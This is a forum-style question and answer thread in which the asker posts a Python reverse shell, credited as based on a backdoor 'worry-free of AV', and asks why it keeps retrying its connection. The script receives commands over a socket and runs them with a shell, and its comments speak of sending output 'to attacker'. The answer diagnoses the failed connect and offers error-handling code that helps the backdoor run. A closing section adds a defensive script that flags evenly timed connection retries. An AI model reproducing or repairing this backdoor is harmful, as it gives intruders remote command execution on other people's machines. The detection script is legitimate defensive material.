
Why does this code keep looping on the first 12 lines of coding?

(Just assume that all of the indents and whitespace are correct)

#! /usr/bin/env python

# Copyright (c) 2011 Xavier Garcia www.shellguardians.com
# All rights reserved.

#  Based on the Python connect back shell written by David Kennedy
#  http://www.secmaniac.com/june-2011/creating-a-13-line-backdoor-worry-free-of-av/

# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
#    notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
#    notice, this list of conditions and the following disclaimer in the
#    documentation and/or other materials provided with the distribution.
# 3. Neither the name of copyright holders nor the names of its
#    contributors may be used to endorse or promote products derived
#    from this software without specific prior written permission.
# 
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL COPYRIGHT HOLDERS OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.


import socket
import subprocess
import sys
import time

HOST = '127.0.0.1'
PORT = 8080
print "Starting Listener and Reverse Shell process."


def connect((host, port)):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print "Okay #1"
    s.connect((host, port))
    print "Accessing..."
    return s


def wait_for_command(s):
    data = s.recv(1024)
    print "Phase three, completed"
    if data == "quit\n":
        s.close()
        sys.exit(0)
        print "Socket Closed. Unable to boot."
    # the socket died
    elif len(data) == 0:
        return True
    else:
        # do shell command
        proc = subprocess.Popen(data, shell=True,
                                stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                                stdin=subprocess.PIPE)
        # read output
        stdout_value = proc.stdout.read() + proc.stderr.read()
        # send output to attacker
        print "I think this worked..."
        return False


def main():
    while True:
        socked_died = False
        try:
            s = connect((HOST, PORT))
            while not socked_died:
                socked_died = wait_for_command(s)
            s.close()
        except socket.error:
            pass
        time.sleep(5)


if __name__ == "__main__":
    sys.exit(main())

This code keeps looping up until it says print "Okay #1". It doesn't seem to move on to the other code lines. I first tried to make this kind of script myself but kept failing, so I went to the internet for help. This code took a while to execute, so I put in print scripts so I can see if this is working properly.

Your connect method is throwing an exception when calling s.connect((host, port)). It prints "Okay #1" but then the next line blows up. So, then it jumps to your except socket.error block and calls pass. It then sleeps for 5ms and then tries all over again, resulting in the same exact thing.

Can you find out what the socket.error is and log it?

Perhaps you can try this (this is based on this link):

s = None
while True:
    socked_died = False
    try:
        s = connect((HOST, PORT))
        while not socked_died:
            socked_died = wait_for_command(s)
        s.close()
    except socket.error, (value, message):
        # s is still None when connect() itself failed, so guard before closing
        if s:
            s.close()
        print "Could not open socket: " + message
        sys.exit(1)
    time.sleep(5)
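From the defender's side, the failing loop above has a recognisable footprint: one process retrying the same host:port on a near-fixed 5-second cadence. The following Python 3 script is an added example, not code from the question or the answer; the log lines and their field layout (timestamp pid dst_ip dst_port result) are constructed for this example and do not reflect any real log format.

```python
import statistics
from collections import defaultdict

# Constructed sample: pid 4242 retries 127.0.0.1:8080 every ~5 s and is
# refused each time (the loop from the question); pid 5151 makes two
# unrelated connections far apart in time.
SAMPLE_LOG = """\
1700000000.0 4242 127.0.0.1 8080 ECONNREFUSED
1700000005.1 4242 127.0.0.1 8080 ECONNREFUSED
1700000010.0 4242 127.0.0.1 8080 ECONNREFUSED
1700000015.2 4242 127.0.0.1 8080 ECONNREFUSED
1700000020.0 4242 127.0.0.1 8080 ECONNREFUSED
1700000003.0 5151 10.0.0.5 443 OK
1700000090.0 5151 10.0.0.5 443 OK
"""


def parse_log(text):
    """Group connection attempts by (pid, dst_ip, dst_port) -> sorted timestamps."""
    groups = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, pid, ip, port, _result = line.split()
        groups[(int(pid), ip, int(port))].append(float(ts))
    return {key: sorted(times) for key, times in groups.items()}


def find_beacons(groups, min_attempts=4, max_jitter=0.5):
    """Return [(key, period)] for targets hit at an evenly spaced cadence.

    Fewer than min_attempts gives too little data to call it a cadence;
    max_jitter is the allowed standard deviation of the gaps in seconds."""
    hits = []
    for key, times in groups.items():
        if len(times) < min_attempts:
            continue
        gaps = [later - earlier for earlier, later in zip(times, times[1:])]
        if statistics.pstdev(gaps) <= max_jitter:
            hits.append((key, round(statistics.mean(gaps), 2)))
    return hits


if __name__ == "__main__":
    for (pid, ip, port), period in find_beacons(parse_log(SAMPLE_LOG)):
        print("retry loop: pid=%d -> %s:%d every ~%ss" % (pid, ip, port, period))
```

Tune min_attempts and max_jitter to your own connection logs; a fixed sleep with no backoff, as in the script above, produces very low jitter.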
